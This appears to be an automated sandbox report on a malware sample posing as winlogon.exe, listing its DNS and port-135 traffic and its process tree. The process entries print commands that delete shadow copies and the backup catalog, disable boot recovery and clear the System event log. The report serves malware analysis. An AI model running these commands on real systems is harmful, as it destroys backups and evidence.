Feb 12, 2018 21:38:33.179438114 CET53494088.8.8.8192.168.2.2
Feb 12, 2018 21:38:33.513441086 CET5729153192.168.2.28.8.8.8
Feb 12, 2018 21:38:33.718898058 CET53572918.8.8.8192.168.2.2
Feb 12, 2018 21:38:34.032504082 CET6422553192.168.2.28.8.8.8
Feb 12, 2018 21:38:34.168128967 CET53642258.8.8.8192.168.2.2
Feb 12, 2018 21:38:34.497317076 CET6401753192.168.2.28.8.8.8
Feb 12, 2018 21:38:34.668488026 CET53640178.8.8.8192.168.2.2
Feb 12, 2018 21:38:34.980822086 CET6157853192.168.2.28.8.8.8
Feb 12, 2018 21:38:35.109461069 CET53615788.8.8.8192.168.2.2
Feb 12, 2018 21:38:35.419275999 CET6480853192.168.2.28.8.8.8
Feb 12, 2018 21:38:35.682538033 CET53648088.8.8.8192.168.2.2
Feb 12, 2018 21:38:35.696975946 CET49169135192.168.2.2192.168.2.254
Feb 12, 2018 21:38:35.823093891 CET49170135192.168.2.2192.168.2.246
Feb 12, 2018 21:38:35.824702978 CET49171135192.168.2.2192.168.2.252
Feb 12, 2018 21:38:35.826517105 CET49172135192.168.2.2192.168.2.248
Feb 12, 2018 21:38:35.827938080 CET49173135192.168.2.2192.168.2.250
Feb 12, 2018 21:38:35.835345030 CET49174135192.168.2.2192.168.2.244
Feb 12, 2018 21:38:35.895308971 CET49175135192.168.2.2192.168.2.240
Feb 12, 2018 21:38:35.896699905 CET49176135192.168.2.2192.168.2.238
Feb 12, 2018 21:38:35.903877974 CET49177135192.168.2.2192.168.2.242
Feb 12, 2018 21:38:36.022747993 CET6353553192.168.2.28.8.8.8
Feb 12, 2018 21:38:36.172410011 CET53635358.8.8.8192.168.2.2
Feb 12, 2018 21:38:36.489626884 CET6411753192.168.2.28.8.8.8
Feb 12, 2018 21:38:36.696399927 CET53641178.8.8.8192.168.2.2
Feb 12, 2018 21:38:37.006269932 CET5512053192.168.2.28.8.8.8
Feb 12, 2018 21:38:37.137315989 CET53551208.8.8.8192.168.2.2
Feb 12, 2018 21:38:37.452662945 CET5896253192.168.2.28.8.8.8
Feb 12, 2018 21:38:37.739259005 CET53589628.8.8.8192.168.2.2
Feb 12, 2018 21:38:38.052788973 CET5022553192.168.2.28.8.8.8
Feb 12, 2018 21:38:38.164005041 CET53502258.8.8.8192.168.2.2
Feb 12, 2018 21:38:38.479089022 CET6027853192.168.2.28.8.8.8
Feb 12, 2018 21:38:38.696377039 CET49169135192.168.2.2192.168.2.254
Feb 12, 2018 21:38:38.718569040 CET53602788.8.8.8192.168.2.2
Feb 12, 2018 21:38:38.880198002 CET49170135192.168.2.2192.168.2.246
Feb 12, 2018 21:38:38.880208969 CET49171135192.168.2.2192.168.2.252
Feb 12, 2018 21:38:38.880218029 CET49172135192.168.2.2192.168.2.248
Feb 12, 2018 21:38:38.880224943 CET49173135192.168.2.2192.168.2.250
Feb 12, 2018 21:38:38.880234003 CET49174135192.168.2.2192.168.2.244
Feb 12, 2018 21:38:38.916991949 CET49175135192.168.2.2192.168.2.240
Feb 12, 2018 21:38:38.917016983 CET49176135192.168.2.2192.168.2.238
Feb 12, 2018 21:38:38.917036057 CET49177135192.168.2.2192.168.2.242
Feb 12, 2018 21:38:39.026475906 CET5521653192.168.2.28.8.8.8
Feb 12, 2018 21:38:39.156883001 CET53552168.8.8.8192.168.2.2
Feb 12, 2018 21:38:39.511333942 CET5695153192.168.2.28.8.8.8
Feb 12, 2018 21:38:39.673909903 CET53569518.8.8.8192.168.2.2
Feb 12, 2018 21:38:39.979579926 CET6205153192.168.2.28.8.8.8
Feb 12, 2018 21:38:40.080379009 CET53620518.8.8.8192.168.2.2
Feb 12, 2018 21:38:40.392570972 CET6104353192.168.2.28.8.8.8
Feb 12, 2018 21:38:40.572628021 CET53610438.8.8.8192.168.2.2
Feb 12, 2018 21:38:40.883240938 CET6439553192.168.2.28.8.8.8
Feb 12, 2018 21:38:41.035156965 CET53643958.8.8.8192.168.2.2
Feb 12, 2018 21:38:41.355576038 CET5741653192.168.2.28.8.8.8
Feb 12, 2018 21:38:41.578322887 CET53574168.8.8.8192.168.2.2
Feb 12, 2018 21:38:41.888006926 CET5526853192.168.2.28.8.8.8
Feb 12, 2018 21:38:42.034862995 CET53552688.8.8.8192.168.2.2
Feb 12, 2018 21:38:42.338536024 CET6506553192.168.2.28.8.8.8
Feb 12, 2018 21:38:42.437918901 CET53650658.8.8.8192.168.2.2
Feb 12, 2018 21:38:42.756555080 CET5340953192.168.2.28.8.8.8
Feb 12, 2018 21:38:42.868976116 CET53534098.8.8.8192.168.2.2
Feb 12, 2018 21:38:43.488595009 CET6188153192.168.2.28.8.8.8
Feb 12, 2018 21:38:43.676775932 CET53618818.8.8.8192.168.2.2
Feb 12, 2018 21:38:44.000485897 CET5398853192.168.2.28.8.8.8
Feb 12, 2018 21:38:44.106827974 CET53539888.8.8.8192.168.2.2
Feb 12, 2018 21:38:44.427696943 CET5565453192.168.2.28.8.8.8
Feb 12, 2018 21:38:44.625426054 CET53556548.8.8.8192.168.2.2
Feb 12, 2018 21:38:44.714911938 CET49169135192.168.2.2192.168.2.254
Feb 12, 2018 21:38:44.915150881 CET49170135192.168.2.2192.168.2.246
Feb 12, 2018 21:38:44.915175915 CET49171135192.168.2.2192.168.2.252
Feb 12, 2018 21:38:44.915184975 CET49172135192.168.2.2192.168.2.248
Feb 12, 2018 21:38:44.915193081 CET49173135192.168.2.2192.168.2.250
Feb 12, 2018 21:38:44.915199995 CET49174135192.168.2.2192.168.2.244
Feb 12, 2018 21:38:44.915205956 CET49175135192.168.2.2192.168.2.240
Feb 12, 2018 21:38:44.915213108 CET49176135192.168.2.2192.168.2.238
Feb 12, 2018 21:38:44.915226936 CET49177135192.168.2.2192.168.2.242
Feb 12, 2018 21:38:44.953222990 CET5453453192.168.2.28.8.8.8
Feb 12, 2018 21:38:45.142456055 CET53545348.8.8.8192.168.2.2
Feb 12, 2018 21:38:45.473556995 CET5120653192.168.2.28.8.8.8
Feb 12, 2018 21:38:45.779345989 CET53512068.8.8.8192.168.2.2
Feb 12, 2018 21:38:46.084404945 CET5489453192.168.2.28.8.8.8
Feb 12, 2018 21:38:46.238379002 CET53548948.8.8.8192.168.2.2
Feb 12, 2018 21:38:46.544713020 CET6011153192.168.2.28.8.8.8
Feb 12, 2018 21:38:46.779881954 CET53601118.8.8.8192.168.2.2

UDP Packets

TimestampSource PortDest PortSource IPDest IP
Feb 12, 2018 21:38:30.860141993 CET5684253192.168.2.28.8.8.8
Feb 12, 2018 21:38:30.880199909 CET5344053192.168.2.28.8.8.8
Feb 12, 2018 21:38:30.880276918 CET53534408.8.8.8192.168.2.2
Feb 12, 2018 21:38:30.905082941 CET5107553192.168.2.28.8.8.8
Feb 12, 2018 21:38:30.905164003 CET53510758.8.8.8192.168.2.2
Feb 12, 2018 21:38:30.927845955 CET6305353192.168.2.28.8.8.8
Feb 12, 2018 21:38:30.927926064 CET53630538.8.8.8192.168.2.2
Feb 12, 2018 21:38:30.995573997 CET6549053192.168.2.28.8.8.8
Feb 12, 2018 21:38:30.995654106 CET53654908.8.8.8192.168.2.2
Feb 12, 2018 21:38:31.002337933 CET6531153192.168.2.28.8.8.8
Feb 12, 2018 21:38:31.002427101 CET53653118.8.8.8192.168.2.2
Feb 12, 2018 21:38:31.012367010 CET5919553192.168.2.28.8.8.8
Feb 12, 2018 21:38:31.012440920 CET53591958.8.8.8192.168.2.2
Feb 12, 2018 21:38:31.036601067 CET6503453192.168.2.28.8.8.8
Feb 12, 2018 21:38:31.036674976 CET53650348.8.8.8192.168.2.2
Feb 12, 2018 21:38:31.050959110 CET5635253192.168.2.28.8.8.8
Feb 12, 2018 21:38:31.051029921 CET53563528.8.8.8192.168.2.2
Feb 12, 2018 21:38:31.059361935 CET5149253192.168.2.28.8.8.8
Feb 12, 2018 21:38:31.059423923 CET53514928.8.8.8192.168.2.2
Feb 12, 2018 21:38:31.765642881 CET53568428.8.8.8192.168.2.2
Feb 12, 2018 21:38:32.179327011 CET6523653192.168.2.28.8.8.8
Feb 12, 2018 21:38:32.311522007 CET53652368.8.8.8192.168.2.2
Feb 12, 2018 21:38:32.616265059 CET5717853192.168.2.28.8.8.8
Feb 12, 2018 21:38:32.753743887 CET53571788.8.8.8192.168.2.2
Feb 12, 2018 21:38:33.061160088 CET4940853192.168.2.28.8.8.8
Feb 12, 2018 21:38:33.179438114 CET53494088.8.8.8192.168.2.2
Feb 12, 2018 21:38:33.513441086 CET5729153192.168.2.28.8.8.8
Feb 12, 2018 21:38:33.718898058 CET53572918.8.8.8192.168.2.2
Feb 12, 2018 21:38:34.032504082 CET6422553192.168.2.28.8.8.8
Feb 12, 2018 21:38:34.168128967 CET53642258.8.8.8192.168.2.2
Feb 12, 2018 21:38:34.497317076 CET6401753192.168.2.28.8.8.8
Feb 12, 2018 21:38:34.668488026 CET53640178.8.8.8192.168.2.2
Feb 12, 2018 21:38:34.980822086 CET6157853192.168.2.28.8.8.8
Feb 12, 2018 21:38:35.109461069 CET53615788.8.8.8192.168.2.2
Feb 12, 2018 21:38:35.419275999 CET6480853192.168.2.28.8.8.8
Feb 12, 2018 21:38:35.682538033 CET53648088.8.8.8192.168.2.2
Feb 12, 2018 21:38:36.022747993 CET6353553192.168.2.28.8.8.8
Feb 12, 2018 21:38:36.172410011 CET53635358.8.8.8192.168.2.2
Feb 12, 2018 21:38:36.489626884 CET6411753192.168.2.28.8.8.8
Feb 12, 2018 21:38:36.696399927 CET53641178.8.8.8192.168.2.2
Feb 12, 2018 21:38:37.006269932 CET5512053192.168.2.28.8.8.8
Feb 12, 2018 21:38:37.137315989 CET53551208.8.8.8192.168.2.2
Feb 12, 2018 21:38:37.452662945 CET5896253192.168.2.28.8.8.8
Feb 12, 2018 21:38:37.739259005 CET53589628.8.8.8192.168.2.2
Feb 12, 2018 21:38:38.052788973 CET5022553192.168.2.28.8.8.8
Feb 12, 2018 21:38:38.164005041 CET53502258.8.8.8192.168.2.2
Feb 12, 2018 21:38:38.479089022 CET6027853192.168.2.28.8.8.8
Feb 12, 2018 21:38:38.718569040 CET53602788.8.8.8192.168.2.2
Feb 12, 2018 21:38:39.026475906 CET5521653192.168.2.28.8.8.8
Feb 12, 2018 21:38:39.156883001 CET53552168.8.8.8192.168.2.2
Feb 12, 2018 21:38:39.511333942 CET5695153192.168.2.28.8.8.8
Feb 12, 2018 21:38:39.673909903 CET53569518.8.8.8192.168.2.2
Feb 12, 2018 21:38:39.979579926 CET6205153192.168.2.28.8.8.8
Feb 12, 2018 21:38:40.080379009 CET53620518.8.8.8192.168.2.2
Feb 12, 2018 21:38:40.392570972 CET6104353192.168.2.28.8.8.8
Feb 12, 2018 21:38:40.572628021 CET53610438.8.8.8192.168.2.2
Feb 12, 2018 21:38:40.883240938 CET6439553192.168.2.28.8.8.8
Feb 12, 2018 21:38:41.035156965 CET53643958.8.8.8192.168.2.2
Feb 12, 2018 21:38:41.355576038 CET5741653192.168.2.28.8.8.8
Feb 12, 2018 21:38:41.578322887 CET53574168.8.8.8192.168.2.2
Feb 12, 2018 21:38:41.888006926 CET5526853192.168.2.28.8.8.8
Feb 12, 2018 21:38:42.034862995 CET53552688.8.8.8192.168.2.2
Feb 12, 2018 21:38:42.338536024 CET6506553192.168.2.28.8.8.8
Feb 12, 2018 21:38:42.437918901 CET53650658.8.8.8192.168.2.2
Feb 12, 2018 21:38:42.756555080 CET5340953192.168.2.28.8.8.8
Feb 12, 2018 21:38:42.868976116 CET53534098.8.8.8192.168.2.2
Feb 12, 2018 21:38:43.488595009 CET6188153192.168.2.28.8.8.8
Feb 12, 2018 21:38:43.676775932 CET53618818.8.8.8192.168.2.2
Feb 12, 2018 21:38:44.000485897 CET5398853192.168.2.28.8.8.8
Feb 12, 2018 21:38:44.106827974 CET53539888.8.8.8192.168.2.2
Feb 12, 2018 21:38:44.427696943 CET5565453192.168.2.28.8.8.8
Feb 12, 2018 21:38:44.625426054 CET53556548.8.8.8192.168.2.2
Feb 12, 2018 21:38:44.953222990 CET5453453192.168.2.28.8.8.8
Feb 12, 2018 21:38:45.142456055 CET53545348.8.8.8192.168.2.2
Feb 12, 2018 21:38:45.473556995 CET5120653192.168.2.28.8.8.8
Feb 12, 2018 21:38:45.779345989 CET53512068.8.8.8192.168.2.2
Feb 12, 2018 21:38:46.084404945 CET5489453192.168.2.28.8.8.8
Feb 12, 2018 21:38:46.238379002 CET53548948.8.8.8192.168.2.2
Feb 12, 2018 21:38:46.544713020 CET6011153192.168.2.28.8.8.8
Feb 12, 2018 21:38:46.779881954 CET53601118.8.8.8192.168.2.2

DNS Queries

TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
Feb 12, 2018 21:38:30.860141993 CET192.168.2.28.8.8.80xb7a7Standard query (0)252.0.0.224.in-addr.arpaPTR (Pointer record)IN (0x0001)
Feb 12, 2018 21:38:32.179327011 CET192.168.2.28.8.8.80xc3ddStandard query (0)252.0.0.224.in-addr.arpaPTR (Pointer record)IN (0x0001)
Feb 12, 2018 21:38:32.616265059 CET192.168.2.28.8.8.80x152Standard query (0)252.0.0.224.in-addr.arpaPTR (Pointer record)IN (0x0001)
Feb 12, 2018 21:38:33.061160088 CET192.168.2.28.8.8.80x26e4Standard query (0)252.0.0.224.in-addr.arpaPTR (Pointer record)IN (0x0001)
Feb 12, 2018 21:38:33.513441086 CET192.168.2.28.8.8.80xcd43Standard query (0)252.0.0.224.in-addr.arpaPTR (Pointer record)IN (0x0001)
Feb 12, 2018 21:38:34.032504082 CET192.168.2.28.8.8.80xc366Standard query (0)252.0.0.224.in-addr.arpaPTR (Pointer record)IN (0x0001)
Feb 12, 2018 21:38:34.497317076 CET192.168.2.28.8.8.80xd809Standard query (0)252.0.0.224.in-addr.arpaPTR (Pointer record)IN (0x0001)
Feb 12, 2018 21:38:34.980822086 CET192.168.2.28.8.8.80xfb5Standard query (0)252.0.0.224.in-addr.arpaPTR (Pointer record)IN (0x0001)
Feb 12, 2018 21:38:35.419275999 CET192.168.2.28.8.8.80xcd9fStandard query (0)252.0.0.224.in-addr.arpaPTR (Pointer record)IN (0x0001)
Feb 12, 2018 21:38:36.022747993 CET192.168.2.28.8.8.80x8b9dStandard query (0)252.0.0.224.in-addr.arpaPTR (Pointer record)IN (0x0001)
Feb 12, 2018 21:38:36.489626884 CET192.168.2.28.8.8.80xaa99Standard query (0)252.0.0.224.in-addr.arpaPTR (Pointer record)IN (0x0001)
Feb 12, 2018 21:38:37.006269932 CET192.168.2.28.8.8.80x2ad9Standard query (0)252.0.0.224.in-addr.arpaPTR (Pointer record)IN (0x0001)
Feb 12, 2018 21:38:37.452662945 CET192.168.2.28.8.8.80x9754Standard query (0)252.0.0.224.in-addr.arpaPTR (Pointer record)IN (0x0001)
Feb 12, 2018 21:38:38.052788973 CET192.168.2.28.8.8.80x9aa7Standard query (0)252.0.0.224.in-addr.arpaPTR (Pointer record)IN (0x0001)
Feb 12, 2018 21:38:38.479089022 CET192.168.2.28.8.8.80x4024Standard query (0)252.0.0.224.in-addr.arpaPTR (Pointer record)IN (0x0001)
Feb 12, 2018 21:38:39.026475906 CET192.168.2.28.8.8.80x7ffStandard query (0)252.0.0.224.in-addr.arpaPTR (Pointer record)IN (0x0001)
Feb 12, 2018 21:38:39.511333942 CET192.168.2.28.8.8.80x3298Standard query (0)252.0.0.224.in-addr.arpaPTR (Pointer record)IN (0x0001)
Feb 12, 2018 21:38:39.979579926 CET192.168.2.28.8.8.80x2c13Standard query (0)252.0.0.224.in-addr.arpaPTR (Pointer record)IN (0x0001)
Feb 12, 2018 21:38:40.392570972 CET192.168.2.28.8.8.80xf3f5Standard query (0)252.0.0.224.in-addr.arpaPTR (Pointer record)IN (0x0001)
Feb 12, 2018 21:38:40.883240938 CET192.168.2.28.8.8.80x1fa9Standard query (0)252.0.0.224.in-addr.arpaPTR (Pointer record)IN (0x0001)
Feb 12, 2018 21:38:41.355576038 CET192.168.2.28.8.8.80x715fStandard query (0)252.0.0.224.in-addr.arpaPTR (Pointer record)IN (0x0001)
Feb 12, 2018 21:38:41.888006926 CET192.168.2.28.8.8.80x948eStandard query (0)252.0.0.224.in-addr.arpaPTR (Pointer record)IN (0x0001)
Feb 12, 2018 21:38:42.338536024 CET192.168.2.28.8.8.80x4034Standard query (0)252.0.0.224.in-addr.arpaPTR (Pointer record)IN (0x0001)
Feb 12, 2018 21:38:42.756555080 CET192.168.2.28.8.8.80xde3eStandard query (0)252.0.0.224.in-addr.arpaPTR (Pointer record)IN (0x0001)
Feb 12, 2018 21:38:43.488595009 CET192.168.2.28.8.8.80xc681Standard query (0)252.0.0.224.in-addr.arpaPTR (Pointer record)IN (0x0001)
Feb 12, 2018 21:38:44.000485897 CET192.168.2.28.8.8.80xee4cStandard query (0)252.0.0.224.in-addr.arpaPTR (Pointer record)IN (0x0001)
Feb 12, 2018 21:38:44.427696943 CET192.168.2.28.8.8.80xb3faStandard query (0)252.0.0.224.in-addr.arpaPTR (Pointer record)IN (0x0001)
Feb 12, 2018 21:38:44.953222990 CET192.168.2.28.8.8.80x10f7Standard query (0)252.0.0.224.in-addr.arpaPTR (Pointer record)IN (0x0001)
Feb 12, 2018 21:38:45.473556995 CET192.168.2.28.8.8.80xfd81Standard query (0)252.0.0.224.in-addr.arpaPTR (Pointer record)IN (0x0001)
Feb 12, 2018 21:38:46.084404945 CET192.168.2.28.8.8.80xc169Standard query (0)252.0.0.224.in-addr.arpaPTR (Pointer record)IN (0x0001)
Feb 12, 2018 21:38:46.544713020 CET192.168.2.28.8.8.80xad00Standard query (0)252.0.0.224.in-addr.arpaPTR (Pointer record)IN (0x0001)

DNS Answers

TimestampSource IPDest IPTrans IDReplay CodeNameCNameAddressTypeClass
Feb 12, 2018 21:38:31.765642881 CET8.8.8.8192.168.2.20xb7a7Name error (3)252.0.0.224.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)
Feb 12, 2018 21:38:32.311522007 CET8.8.8.8192.168.2.20xc3ddName error (3)252.0.0.224.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)
Feb 12, 2018 21:38:32.753743887 CET8.8.8.8192.168.2.20x152Name error (3)252.0.0.224.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)
Feb 12, 2018 21:38:33.179438114 CET8.8.8.8192.168.2.20x26e4Name error (3)252.0.0.224.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)
Feb 12, 2018 21:38:33.718898058 CET8.8.8.8192.168.2.20xcd43Name error (3)252.0.0.224.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)
Feb 12, 2018 21:38:34.168128967 CET8.8.8.8192.168.2.20xc366Name error (3)252.0.0.224.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)
Feb 12, 2018 21:38:34.668488026 CET8.8.8.8192.168.2.20xd809Name error (3)252.0.0.224.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)
Feb 12, 2018 21:38:35.109461069 CET8.8.8.8192.168.2.20xfb5Name error (3)252.0.0.224.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)
Feb 12, 2018 21:38:35.682538033 CET8.8.8.8192.168.2.20xcd9fName error (3)252.0.0.224.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)
Feb 12, 2018 21:38:36.172410011 CET8.8.8.8192.168.2.20x8b9dName error (3)252.0.0.224.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)
Feb 12, 2018 21:38:36.696399927 CET8.8.8.8192.168.2.20xaa99Name error (3)252.0.0.224.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)
Feb 12, 2018 21:38:37.137315989 CET8.8.8.8192.168.2.20x2ad9Name error (3)252.0.0.224.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)
Feb 12, 2018 21:38:37.739259005 CET8.8.8.8192.168.2.20x9754Name error (3)252.0.0.224.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)
Feb 12, 2018 21:38:38.164005041 CET8.8.8.8192.168.2.20x9aa7Name error (3)252.0.0.224.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)
Feb 12, 2018 21:38:38.718569040 CET8.8.8.8192.168.2.20x4024Name error (3)252.0.0.224.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)
Feb 12, 2018 21:38:39.156883001 CET8.8.8.8192.168.2.20x7ffName error (3)252.0.0.224.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)
Feb 12, 2018 21:38:39.673909903 CET8.8.8.8192.168.2.20x3298Name error (3)252.0.0.224.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)
Feb 12, 2018 21:38:40.080379009 CET8.8.8.8192.168.2.20x2c13Name error (3)252.0.0.224.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)
Feb 12, 2018 21:38:40.572628021 CET8.8.8.8192.168.2.20xf3f5Name error (3)252.0.0.224.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)
Feb 12, 2018 21:38:41.035156965 CET8.8.8.8192.168.2.20x1fa9Name error (3)252.0.0.224.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)
Feb 12, 2018 21:38:41.578322887 CET8.8.8.8192.168.2.20x715fName error (3)252.0.0.224.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)
Feb 12, 2018 21:38:42.034862995 CET8.8.8.8192.168.2.20x948eName error (3)252.0.0.224.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)
Feb 12, 2018 21:38:42.437918901 CET8.8.8.8192.168.2.20x4034Name error (3)252.0.0.224.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)
Feb 12, 2018 21:38:42.868976116 CET8.8.8.8192.168.2.20xde3eName error (3)252.0.0.224.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)
Feb 12, 2018 21:38:43.676775932 CET8.8.8.8192.168.2.20xc681Name error (3)252.0.0.224.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)
Feb 12, 2018 21:38:44.106827974 CET8.8.8.8192.168.2.20xee4cName error (3)252.0.0.224.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)
Feb 12, 2018 21:38:44.625426054 CET8.8.8.8192.168.2.20xb3faName error (3)252.0.0.224.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)
Feb 12, 2018 21:38:45.142456055 CET8.8.8.8192.168.2.20x10f7Name error (3)252.0.0.224.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)
Feb 12, 2018 21:38:45.779345989 CET8.8.8.8192.168.2.20xfd81Name error (3)252.0.0.224.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)
Feb 12, 2018 21:38:46.238379002 CET8.8.8.8192.168.2.20xc169Name error (3)252.0.0.224.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)
Feb 12, 2018 21:38:46.779881954 CET8.8.8.8192.168.2.20xad00Name error (3)252.0.0.224.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: winlogon.exe PID: 3216 Parent PID: 2940

General

Start time:21:38:46
Start date:12/02/2018
Path:C:\Users\user\Desktop\winlogon.exe
Wow64 process (32bit):false
Commandline:'C:\Users\user\Desktop\winlogon.exe'
Imagebase:0xd60000
File size:1861632 bytes
MD5 hash:CFDD16225E67471F5EF54CAB9B3A5558
Programmed in:C, C++ or other language
Reputation:low

Chronological Activities

Analysis Process: yegus.exe PID: 3232 Parent PID: 3216

General

Start time:21:38:46
Start date:12/02/2018
Path:C:\Users\user\AppData\Local\Temp\yegus.exe
Wow64 process (32bit):false
Commandline: 123 \\.\pipe\122B85FE-84BD-45AB-AEE5-28D37FB4C464
Imagebase:0x1330000
File size:769536 bytes
MD5 hash:4F43F03783F9789F804DCF9B9474FA6D
Programmed in:C, C++ or other language
Reputation:low

Chronological Activities

Analysis Process: ucngw.exe PID: 3280 Parent PID: 3216

General

Start time:21:38:47
Start date:12/02/2018
Path:C:\Users\user\AppData\Local\Temp\ucngw.exe
Wow64 process (32bit):false
Commandline: 123 \\.\pipe\33F83B68-FC3D-4C1F-B4AE-1329770D367B
Imagebase:0xc50000
File size:231424 bytes
MD5 hash:6E0EBEEEA1CB00192B074B288A4F9CFE
Programmed in:C, C++ or other language
Reputation:low

Chronological Activities

Analysis Process: _usm.exe PID: 3296 Parent PID: 3216

General

Start time:21:38:49
Start date:12/02/2018
Path:C:\Users\user\AppData\Local\Temp\_usm.exe
Wow64 process (32bit):false
Commandline:C:\Users\HERBBL~1\AppData\Local\Temp\_usm.exe
Imagebase:0x140000
File size:36864 bytes
MD5 hash:3C0D740347B0362331C882C2DEE96DBF
Programmed in:C, C++ or other language
Reputation:low

Chronological Activities

Analysis Process: cmd.exe PID: 3336 Parent PID: 3296

General

Start time:21:38:49
Start date:12/02/2018
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c c:\Windows\system32\vssadmin.exe delete shadows /all /quiet
Imagebase:0x4a9e0000
File size:302592 bytes
MD5 hash:AD7B9C14083B52BC532FBA5948342B98
Programmed in:C, C++ or other language
Reputation:high

Chronological Activities

Analysis Process: vssadmin.exe PID: 3372 Parent PID: 3336

General

Start time:21:38:50
Start date:12/02/2018
Path:C:\Windows\System32\vssadmin.exe
Wow64 process (32bit):false
Commandline:c:\Windows\system32\vssadmin.exe delete shadows /all /quiet
Imagebase:0x6e0000
File size:115200 bytes
MD5 hash:6E248A3D528EDE43994457CF417BD665
Programmed in:C, C++ or other language
Reputation:moderate

Chronological Activities

Analysis Process: cmd.exe PID: 3404 Parent PID: 3296

General

Start time:21:38:51
Start date:12/02/2018
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c wbadmin.exe delete catalog -quiet
Imagebase:0x4a0d0000
File size:302592 bytes
MD5 hash:AD7B9C14083B52BC532FBA5948342B98
Programmed in:C, C++ or other language
Reputation:high

Chronological Activities

Analysis Process: wbadmin.exe PID: 3428 Parent PID: 3404

General

Start time:21:38:52
Start date:12/02/2018
Path:C:\Windows\System32\wbadmin.exe
Wow64 process (32bit):false
Commandline:wbadmin.exe delete catalog -quiet
Imagebase:0x670000
File size:224768 bytes
MD5 hash:EAB630E7E6A7FC248870A2FCDC098B98
Programmed in:C, C++ or other language
Reputation:moderate

Chronological Activities

Analysis Process: wbengine.exe PID: 3464 Parent PID: 424

General

Start time:21:38:52
Start date:12/02/2018
Path:C:\Windows\System32\wbengine.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\wbengine.exe
Imagebase:0xbf0000
File size:1203200 bytes
MD5 hash:691E3285E53DCA558E1A84667F13E15A
Programmed in:C, C++ or other language
Reputation:low

Chronological Activities

Analysis Process: vdsldr.exe PID: 3496 Parent PID: 548

General

Start time:21:38:52
Start date:12/02/2018
Path:C:\Windows\System32\vdsldr.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\vdsldr.exe -Embedding
Imagebase:0x3b0000
File size:19968 bytes
MD5 hash:A2551668C78CEA4089D71A0A3B36FC0C
Programmed in:C, C++ or other language
Reputation:low

Chronological Activities

Analysis Process: vds.exe PID: 3524 Parent PID: 424

General

Start time:21:38:53
Start date:12/02/2018
Path:C:\Windows\System32\vds.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\vds.exe
Imagebase:0xac0000
File size:453632 bytes
MD5 hash:C3CD30495687C2A2F66A65CA6FD89BE9
Programmed in:C, C++ or other language
Reputation:moderate

Chronological Activities

Analysis Process: cmd.exe PID: 3668 Parent PID: 3296

General

Start time:21:38:55
Start date:12/02/2018
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
Imagebase:0x4a460000
File size:302592 bytes
MD5 hash:AD7B9C14083B52BC532FBA5948342B98
Programmed in:C, C++ or other language
Reputation:high

Chronological Activities

Analysis Process: bcdedit.exe PID: 3692 Parent PID: 3668

General

Start time:21:38:55
Start date:12/02/2018
Path:C:\Windows\System32\bcdedit.exe
Wow64 process (32bit):false
Commandline:bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
Imagebase:0x5b0000
File size:295936 bytes
MD5 hash:ABD373E82F6240031C1E631AA20711C7
Programmed in:C, C++ or other language
Reputation:moderate

Chronological Activities

Analysis Process: bcdedit.exe PID: 3700 Parent PID: 3668

General

Start time:21:38:56
Start date:12/02/2018
Path:C:\Windows\System32\bcdedit.exe
Wow64 process (32bit):false
Commandline:bcdedit /set {default} recoveryenabled no
Imagebase:0xcf0000
File size:295936 bytes
MD5 hash:ABD373E82F6240031C1E631AA20711C7
Programmed in:C, C++ or other language
Reputation:moderate

Chronological Activities

Analysis Process: cmd.exe PID: 3708 Parent PID: 3296

General

Start time:21:38:57
Start date:12/02/2018
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c wevtutil.exe cl System
Imagebase:0x4a640000
File size:302592 bytes
MD5 hash:AD7B9C14083B52BC532FBA5948342B98
Programmed in:C, C++ or other language
Reputation:high

Chronological Activities

Analysis Process: wevtutil.exe PID: 3732 Parent PID: 3708

General

Start time:21:38:58
Start date:12/02/2018
Path:C:\Windows\System32\wevtutil.exe
Wow64 process (32bit):false
Commandline:wevtutil.exe cl System
Imagebase:0x100000
File size:175616 bytes
MD5 hash:81538B795F922B8DA6FD897EFB04B5EE
Programmed in:C, C++ or other language
Reputation:low

Chronological Activities

Analysis Process: cmd.exe PID: 3748 Parent PID: 3296

General

